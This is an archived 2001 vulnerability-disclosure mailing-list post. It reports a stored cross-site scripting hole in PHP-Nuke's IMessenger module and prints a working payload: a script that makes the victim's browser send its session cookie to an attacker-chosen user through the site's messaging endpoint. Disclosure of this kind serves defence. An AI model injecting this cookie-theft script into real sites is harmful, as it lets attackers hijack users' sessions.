Vulnerability Development mailing list archives
Serious Hole in IMessenger ( php-nuke )
From: frog frog <leseulfrog () hotmail com>
Date: 19 Dec 2001 10:02:05 -0000
IMessenger is on http://www.SERVER.com/im.php? action=Check+IM . IM accepts the javascript. If I send to a user or to the webmaster the script <s*cript>window.location.href='http://www.SERVER.c om/im.php?username_to= [NICKNAME] &subject='+ document.cookie +'&message=message&action=send' ;</s*cript> (without '*'), he will send back his cookie to the user NICKNAME. One can so directly execute javascript on the connected user's computer. frog-m@n
Current thread:
- Serious Hole in IMessenger ( php-nuke ) frog frog (Dec 19)